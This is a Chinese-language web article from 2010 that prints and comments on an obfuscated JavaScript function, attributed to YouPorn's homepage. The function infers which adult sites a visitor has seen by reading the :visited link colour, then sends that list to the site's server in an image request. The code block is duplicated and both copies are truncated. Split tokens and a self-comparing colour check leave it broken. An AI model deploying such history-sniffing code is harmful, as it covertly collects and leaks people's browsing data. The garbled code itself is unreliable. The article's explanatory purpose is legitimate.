悄悄用腳本檢查你訪問過(guò)哪些網(wǎng)站的代碼
更新時(shí)間:2010年12月04日 22:14:15 作者:
YouPorn是YouTube的成人自拍版,Alexa排名61。如果你登陸YouPorn主頁(yè),它會(huì)悄悄用腳本檢查你訪問過(guò)哪些色情網(wǎng)站。
打開它的“頁(yè)面源文件”,你能找到一段加密過(guò)的JS腳本:
function ypol(){
//K是一個(gè)對(duì)象,實(shí)際上是一個(gè)數(shù)組。存了一堆加密過(guò)的pr*n站鏈接。
var k={0:"qpsoivc/dpn",1:"sfeuvcf/dpn",2:"bevmugsjfoeg joefs/dpn",3:"ywjefpt/dpn",4:"uvcf9/dpn",5:"yoyy/d pn",6:"nfhbqpso/dpn",7:"nfhbspujd/dpn",8:"yibntufs /dpn",9:"bxfnqjsf/dpn",10:"sfbmjuzljoht/dpn",11:"c sb{{fst/dpn",12:"yuvcf/dpn",13:"cbohcspt2/dpn",14: "gmjoh/dpn",15:"gsffpoft/dpn",16:"nzgsffqbztjuf/dp n",17:"efcpobjscmph/dpn",18:"qbztfswf/dpn",19:"nby qpso/dpn",20:"wjefpt{/dpn",21:"bfco/ofu",22:"qpsop sbnb/dpn"};
var g=[];
for(var m in k){
var d=k[m]; //遍歷k中的元素賦值給d
var a="";
for(var f=0;f<d.length;f++){
a+=String.fromCharCode(d.charCodeAt(f)-1);
}/* 這里把d中的每一條字符都還原了。
* charCodeAt(char) 函數(shù)返回char的ascii碼
* String.fromCharCode(asccii) 返回ascii碼對(duì)應(yīng)的字符
* 然后把結(jié)果賦值給a
* 比如第一次循環(huán),a的值就是 qpsoivc/dpn -> pornhub.com
*/
var h=false;
/*
* 這個(gè)循環(huán)創(chuàng)建A對(duì)象并讓鏈接賦值為 http://a/ 和 http://www.a/
* 為什么要循環(huán)來(lái)2次,目的是為了準(zhǔn)確性
* 訪問 http://example.com/ 和 http://www.example.com/ 對(duì)于瀏覽器來(lái)說(shuō),是不同的域名
* 所以要區(qū)別對(duì)待
*/
for(var j in {"http://":"","http://www.":""}){
var l=document.createElement("a"); //創(chuàng)建一個(gè)A對(duì)象
l.href=j+a;
document.getElementById("ol").appendChild(l);
// A對(duì)象附加給一個(gè)id為ol的元素上,要附加在一個(gè)在DOM樹上的元素,瀏覽器才會(huì)render這個(gè)元素,并設(shè)置合適的CSS
var e="";
if(navigator.appName.indexOf("Microsoft")!=-1){
e=l.currentStyle.color; //取IE中A對(duì)象的顏色
}else {
e=document.defaultView.getComputedStyle(l,null).ge tPropertyValue("color");
//取其他標(biāo)準(zhǔn)瀏覽器的顏色
}
if(e=="#0c2238"||e=="#0c2238"){
/*
* 如果是紫色,就表示訪問過(guò)此站點(diǎn)。
* 瀏覽器默認(rèn)給訪問過(guò)的鏈接標(biāo)記為紫色
* a:visited{color: #123456}
*/
h=true;
}
}
if(h){ //如果訪問過(guò),把站點(diǎn)加入列表g
g.push(m);
}
}
var b=(g instanceof Array)?g.join(","):""; //把g由數(shù)組變成字符串
var c=document.createElement("img"); //建立一個(gè)img對(duì)象
c.src="http://ol.youporn.com/blank.gif?id="+b; //img的src指向自家服務(wù)器上的一幅圖像,關(guān)鍵是附帶上了g數(shù)組的值
document.getElementById("ol").appendChild(c); //加入DOM樹,理由跟前面的A一樣
/*
* 以一次圖片訪問,在web-server
復(fù)制代碼 代碼如下:
function ypol(){
//K是一個(gè)對(duì)象,實(shí)際上是一個(gè)數(shù)組。存了一堆加密過(guò)的pr*n站鏈接。
var k={0:"qpsoivc/dpn",1:"sfeuvcf/dpn",2:"bevmugsjfoeg joefs/dpn",3:"ywjefpt/dpn",4:"uvcf9/dpn",5:"yoyy/d pn",6:"nfhbqpso/dpn",7:"nfhbspujd/dpn",8:"yibntufs /dpn",9:"bxfnqjsf/dpn",10:"sfbmjuzljoht/dpn",11:"c sb{{fst/dpn",12:"yuvcf/dpn",13:"cbohcspt2/dpn",14: "gmjoh/dpn",15:"gsffpoft/dpn",16:"nzgsffqbztjuf/dp n",17:"efcpobjscmph/dpn",18:"qbztfswf/dpn",19:"nby qpso/dpn",20:"wjefpt{/dpn",21:"bfco/ofu",22:"qpsop sbnb/dpn"};
var g=[];
for(var m in k){
var d=k[m]; //遍歷k中的元素賦值給d
var a="";
for(var f=0;f<d.length;f++){
a+=String.fromCharCode(d.charCodeAt(f)-1);
}/* 這里把d中的每一條字符都還原了。
* charCodeAt(char) 函數(shù)返回char的ascii碼
* String.fromCharCode(asccii) 返回ascii碼對(duì)應(yīng)的字符
* 然后把結(jié)果賦值給a
* 比如第一次循環(huán),a的值就是 qpsoivc/dpn -> pornhub.com
*/
var h=false;
/*
* 這個(gè)循環(huán)創(chuàng)建A對(duì)象并讓鏈接賦值為 http://a/ 和 http://www.a/
* 為什么要循環(huán)來(lái)2次,目的是為了準(zhǔn)確性
* 訪問 http://example.com/ 和 http://www.example.com/ 對(duì)于瀏覽器來(lái)說(shuō),是不同的域名
* 所以要區(qū)別對(duì)待
*/
for(var j in {"http://":"","http://www.":""}){
var l=document.createElement("a"); //創(chuàng)建一個(gè)A對(duì)象
l.href=j+a;
document.getElementById("ol").appendChild(l);
// A對(duì)象附加給一個(gè)id為ol的元素上,要附加在一個(gè)在DOM樹上的元素,瀏覽器才會(huì)render這個(gè)元素,并設(shè)置合適的CSS
var e="";
if(navigator.appName.indexOf("Microsoft")!=-1){
e=l.currentStyle.color; //取IE中A對(duì)象的顏色
}else {
e=document.defaultView.getComputedStyle(l,null).ge tPropertyValue("color");
//取其他標(biāo)準(zhǔn)瀏覽器的顏色
}
if(e=="#0c2238"||e=="#0c2238"){
/*
* 如果是紫色,就表示訪問過(guò)此站點(diǎn)。
* 瀏覽器默認(rèn)給訪問過(guò)的鏈接標(biāo)記為紫色
* a:visited{color: #123456}
*/
h=true;
}
}
if(h){ //如果訪問過(guò),把站點(diǎn)加入列表g
g.push(m);
}
}
var b=(g instanceof Array)?g.join(","):""; //把g由數(shù)組變成字符串
var c=document.createElement("img"); //建立一個(gè)img對(duì)象
c.src="http://ol.youporn.com/blank.gif?id="+b; //img的src指向自家服務(wù)器上的一幅圖像,關(guān)鍵是附帶上了g數(shù)組的值
document.getElementById("ol").appendChild(c); //加入DOM樹,理由跟前面的A一樣
/*
* 以一次圖片訪問,在web-server
相關(guān)文章
線路分流自動(dòng)跳轉(zhuǎn)代碼;希望對(duì)大家有用!
線路分流自動(dòng)跳轉(zhuǎn)代碼;希望對(duì)大家有用!...2006-12-12js實(shí)現(xiàn)文章目錄索引導(dǎo)航(table of content)
這篇文章主要介紹了js實(shí)現(xiàn)文章目錄索引導(dǎo)航(table of content),需要的朋友可以參考下2020-05-05Bootstrap入門教程一Hello Bootstrap初識(shí)
Bootstrap,來(lái)自 Twitter,是目前很受歡迎的前端框架。Bootstrap是基于 HTML5、CSS3和Javascriopt開發(fā)的。這篇文章主要介紹了基于Bootstrap3實(shí)現(xiàn)漂亮簡(jiǎn)潔的CSS3價(jià)格表(精美代碼版),需要的朋友可以參考下2017-03-03利用webpack理解CommonJS和ES Modules的差異區(qū)別
這篇文章主要介紹了利用webpack理解CommonJS和ES Modules的差異區(qū)別,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧2020-06-06詳解ES6 Fetch API HTTP請(qǐng)求實(shí)用指南
本次將介紹如何使用Fetch API(ES6 +)對(duì)REST API的 HTTP請(qǐng)求,還有一些示例提供給大家便于大家理解。具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下2018-11-11一個(gè)簡(jiǎn)單的全屏圖片上下打開顯示網(wǎng)頁(yè)效果示例
這是一個(gè)簡(jiǎn)單的全屏圖片上下打開顯示網(wǎng)頁(yè)效果,源碼如下,喜歡的朋友可以練練手2014-07-07